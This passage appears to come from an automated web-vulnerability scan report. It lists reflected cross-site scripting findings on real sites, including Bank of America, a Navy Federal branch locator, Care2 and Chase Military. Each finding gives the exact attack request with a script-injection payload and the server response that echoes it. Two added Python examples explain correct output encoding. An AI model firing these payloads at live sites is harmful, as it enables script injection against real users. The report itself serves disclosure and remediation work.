HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:13 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/pap88c92"><script>alert(1)</script>201cd186128/index.cfm">
...[SNIP]...

3.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /studentbanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:58 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm">
...[SNIP]...

3.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /vehicle_and_personal_loans/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:20 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm">
...[SNIP]...

3.86. http://www.branchmap.com/mapserver.php [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:06:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='9';
var myaddress='';
var mystate='';
var mycity='9a923</script><script>alert(1)</script>09ca345e6cd';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(12
...[SNIP]...

3.87. http://www.branchmap.com/mapserver.php [dist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='96a6fe</script><script>alert(1)</script>c091167078b';
var myaddress='';
var mystate='';
var mycity='';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(
...[SNIP]...

3.88. http://www.branchmap.com/mapserver.php [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script type="text/javascript">

var mydist='3';
var myaddress='';
var mystate='';
var mycity='';
var myzip='17a84</script><script>alert(1)</script>6bbb498c306';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(8);
var maptype
...[SNIP]...

3.89. http://www.branchmap.com/mapserver.php [zoom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.branchmap.com
Path:   /mapserver.php

Issue detail

The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<title>Navy Federal BranchMap</title>
<head>
<script t
...[SNIP]...
';
var myzip='';
var mylat='';
var mylon='';
var clientid='navy';
var mynetworklist='vcom,coop,cashpoints,moneypass,keybank';
var maxlocations=parseInt(5);
var sortstrict= '0';
var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8);
var maptype = '';
var mapwidth= '552';
var mapheight= '500';
var zoomfirst = '';
var myversion = 'v53';
var dedupeList = 'navy';
var drivingDir = '';
var noOriginPoint = '';
var disclaimer = '';
var
...[SNIP]...
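
The four branchmap.com findings above (3.86 to 3.89) hit two inline-script contexts: a single-quoted JavaScript string (city, dist, zip) that the payload leaves by writing a literal </script>, and a bare parseInt(...) argument (zoom) that accepts any JavaScript expression because there is no delimiter at all. The following is an added example written for this report; it is not code from branchmap.com or from the scanner. It shows why JSON-encoding alone does not fix the string case (the HTML tokenizer ends the script element at the first </script> regardless of JavaScript string state, so < and > must be hex-escaped as well) and why the numeric case has to be validated rather than escaped. The render functions are constructed stand-ins for the mapserver.php template; the payload strings are the ones the report submitted.

```python
"""Added example for findings 3.86-3.89 (editor's code, not branchmap.com's or
the scanner's): safe emission into the two inline-script contexts those
findings hit, a quoted JavaScript string and a bare parseInt() argument."""
import json
import re

# Payloads exactly as the report submitted them (after URL decoding).
CITY_PAYLOAD = '9a923</script><script>alert(1)</script>09ca345e6cd'
ZOOM_PAYLOAD = '122ceaa;alert(1)//c7cc7a9b7c8'


def js_string_literal(value: str) -> str:
    """JSON-encode (handles quotes, backslashes, control characters and, with
    ensure_ascii, U+2028/U+2029), then hex-escape <, > and & on top.
    json.dumps alone leaves '</script>' intact, and the HTML tokenizer ends
    the script element there regardless of JavaScript string state."""
    literal = json.dumps(value, ensure_ascii=True)
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def js_int(value: str, lo: int, hi: int) -> int:
    """For an unquoted numeric context such as parseInt(12): accept only a
    short decimal integer inside the expected range and reject the rest.
    Escaping cannot help here because there is no delimiter to escape."""
    if not re.fullmatch(r'-?\d{1,6}', value):
        raise ValueError('zoom is not an integer: %r' % value)
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError('zoom out of range: %d' % n)
    return n


def render_script(city: str, zoom: str) -> str:
    """Constructed stand-in for the mapserver.php inline script, with both
    contexts rendered through the functions above."""
    return ('<script type="text/javascript">\n'
            'var mycity=%s;\n'
            'var myzoom=parseInt(%d);\n'
            '</script>' % (js_string_literal(city), js_int(zoom, 0, 21)))


def vulnerable_render_script(city: str, zoom: str) -> str:
    """What the responses in 3.86-3.89 show: raw values dropped into the script."""
    return ('<script type="text/javascript">\n'
            "var mycity='%s';\n"
            'var myzoom=parseInt(%s);\n'
            '</script>' % (city, zoom))


def script_closed_early(markup: str) -> bool:
    """The tokenizer ends a <script> element at the first '</script' it sees,
    case-insensitively; more than one occurrence means the page's own script
    was cut short and whatever follows is parsed as fresh markup."""
    return len(re.findall(r'</script', markup, re.IGNORECASE)) > 1


if __name__ == '__main__':
    print(vulnerable_render_script(CITY_PAYLOAD, '12'))
    print(render_script(CITY_PAYLOAD, '12'))
    try:
        render_script('Vienna', ZOOM_PAYLOAD)
    except ValueError as err:
        print('rejected:', err)
```

The point of js_int is that the zoom finding (3.89) cannot be fixed by any escaping function: in `parseInt(122ceaa;alert(1)//...)` there is no quote to encode, so the only correct treatment is to refuse anything that is not the integer the template expects.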

3.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:07:40 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 76015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78"
s.server="www.care2.com"
s.channel="Greenliving"
s.pageType=""
s.prop3="Greenliving"
s.prop16="Unregistered"
s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script>
...[SNIP]...

3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:06 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=76875f7136cd6b6fa77b12431af6f845%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=a29576ec1e14546db9a5710320918bfb%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
-1555312', 'mouseover', function(){memberRollover.mem(this);;});
new CARE2.prime.PillManager('d9a3e6ff-1');
function onFacebookConnect() {
var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form";
C2FBConnect.onConnect(pg);
}
FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm");
if($('newCommentForm')) {

var theForm = $('newCommentForm').getElementsB
...[SNIP]...

3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:20 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=9f2472a448b873474901c8c8211d15c4%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e5dde59e923be04df3ab69c16d9aa184%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:21 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<script type="text/javascript">

function loadCommentPage(page, numPerPage, itemID)
{
var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1';
var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?";
var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;

...[SNIP]...

3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response. The backslash shows that the application applied a JavaScript or SQL style escape (addslashes) to a value it then wrote into an HTML attribute; HTML has no backslash escape, so the tokenizer still ends the attribute at the quote and the injected tag is parsed as markup. Escaping must match the output context, here &quot; for the quote.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:50 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=0e4516f4eaebfc055e9af2d16a87a343%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=b3342346d15f1b20be2442ecb6ff0483%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:51 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" />
...[SNIP]...
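
The Bank of America findings 3.81 to 3.85 and care2 finding 3.93 land in the same context, a double-quoted value attribute of a hidden input, and differ only in what the application did to the quote: nothing in the 404 page, a backslash in care2's comment form. The example below is added here and is not code from either site or from the scanner; it feeds each variant through Python's standard-library HTML tokenizer and reports whether a script start tag appears that the template never wrote, then shows the same value rendered with proper attribute encoding. The surrounding input markup is a constructed stand-in for the real templates; the two payload strings are the ones the report submitted.

```python
"""Added example for findings 3.81-3.85 and 3.93 (editor's code, not the
sites' templates or the scanner's): run each reflection variant through
Python's stdlib HTML tokenizer and report whether a <script> start tag
appears that the template never wrote."""
from html import escape
from html.parser import HTMLParser

# Reflected values exactly as the report submitted them.
BOA_PATH = ('http://www.bankofamerica.com/loansandhomesa99e1"><script>'
            'alert(1)</script>5ff4d40fe3b/index.cfm')
CARE2_PG = ('/greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>'
            'alert(1)</script>7188eebfdad=1#comment_form')


def no_escape(value: str) -> str:
    """3.81-3.85: the 404 page writes the requested URL into the attribute as-is."""
    return value


def backslash_escape(value: str) -> str:
    """3.93: care2 applies a JavaScript/SQL-style addslashes to an HTML attribute.
    HTML has no backslash escape, so the quote still ends the attribute value."""
    return value.replace('\\', '\\\\').replace('"', '\\"')


def html_attr(value: str) -> str:
    """Correct encoding for a double-quoted attribute value: &, <, >, " and '
    become character references, which the tokenizer never treats as markup."""
    return escape(value, quote=True)


def render_hidden_input(name: str, value: str, encoder) -> str:
    """Constructed stand-in for the hidden-input template seen in the responses."""
    return '<input type="hidden" name="%s" value="%s">' % (name, encoder(value))


class TagCollector(HTMLParser):
    """Records every start tag with its (already entity-decoded) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    """Start tags as a browser-like tokenizer sees them."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_script(markup: str) -> bool:
    """True when a <script> start tag shows up, i.e. the value broke out of
    the attribute and became markup."""
    return any(tag == 'script' for tag, _ in parse_tags(markup))


if __name__ == '__main__':
    cases = [
        ('3.81 raw (bankofamerica.com)', 'URL', BOA_PATH, no_escape),
        ('3.93 backslash (care2.com)', 'pg', CARE2_PG, backslash_escape),
        ('html.escape(quote=True)', 'pg', CARE2_PG, html_attr),
    ]
    for label, name, value, enc in cases:
        markup = render_hidden_input(name, value, enc)
        print('%-30s script tag injected: %s' % (label, injected_script(markup)))
```

With html_attr the tokenizer returns a single input tag whose decoded value is the original string, quotes and angle brackets included, which is exactly what a hidden field carrying a URL needs; the backslash variant and the raw variant both yield an extra script tag.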

3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. The response below echoes it, with %3b decoded, as 8517F";ALERT(1)//55B2694A95C: when the application rebuilds its query string for flashvarsADA.adaLink it upper-cases parameter names and percent-encodes the & separators as %26, but leaves the double quote intact, so the string is still broken out of (URL encoding is not JavaScript string escaping). Because JavaScript identifiers are case-sensitive, ALERT(1) as written will not call alert; confirm in a browser with a payload that survives the upper-casing before treating this proof of concept as working.

This proof of concept shows that the JavaScript string can be broken out of; whether arbitrary JavaScript then runs depends on the upper-casing noted above.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly
Date: Wed, 02 Feb 2011 22:16:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%268517F";ALERT(1)//55B2694A95C=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

3.95. http://www.chasemilitary.com/Default.aspx [ada parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response. Unlike the parameter-name findings 3.94 and 3.96, the value keeps its case (only the name is upper-cased, to ADA, in the rebuilt query string), so the breakout reads as valid JavaScript exactly as shown.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68621
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 01:06:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
